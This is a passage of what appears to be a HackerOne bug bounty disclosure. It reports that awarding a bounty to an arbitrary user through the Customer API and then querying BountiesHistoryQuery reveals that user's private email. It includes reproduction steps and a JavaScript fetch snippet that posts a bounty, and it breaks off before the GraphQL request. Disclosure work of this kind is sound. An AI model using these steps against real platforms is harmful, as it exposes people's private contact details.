📚 HackerOne: Creation of bounties through Customer API leads to private email disclosure

Summary: Hello team, It is possible to reveal any user email using the BountiesHistoryQuery request. To demonstrate this, I will make use of both the API and the graphql requests. Steps To Reproduce Log in to your account and create a demo Head over to https://hackerone.com/organizations/████/settings/api_tokens and create a token with the report manager role Head over to any profile of a user in hackerone and copy their user id Use this request below to award a program bounty to that user using the API. recipient_id is the id of any user and {id} is your sandbox program id. ``` let inputBody = "{\n \"data\": {\n \"type\": \"bounty\",\n \"attributes\": {\n \"recipient_id\": \"██████████\",\n \"amount\": 51,\n \"reference\": \"newbounty\",\n \"title\": \"BOUNTY FROM Sandbox\",\n \"currency\": \"USD\",\n \"severity_rating\": \"high\"\n }\n }\n}"; let user = 'identifier'; let password = 'token'; let headers = new Headers(); headers.set('Authorization', 'Basic ' + btoa(user + ":" + password)); headers.set('Content-Type', 'application/json'); headers.set('Accept', 'application/json'); fetch('https://api.hackerone.com/v1/programs/{id}/bounties', { method: 'POST', body: inputBody, headers: headers }) .then(function(res) { return res.json(); }).then(function(body) { console.log(body); }); ``` 5. You will get a success message ██████ 6. After awarding the bounty, make the following Graphql request. Where handle is the... ...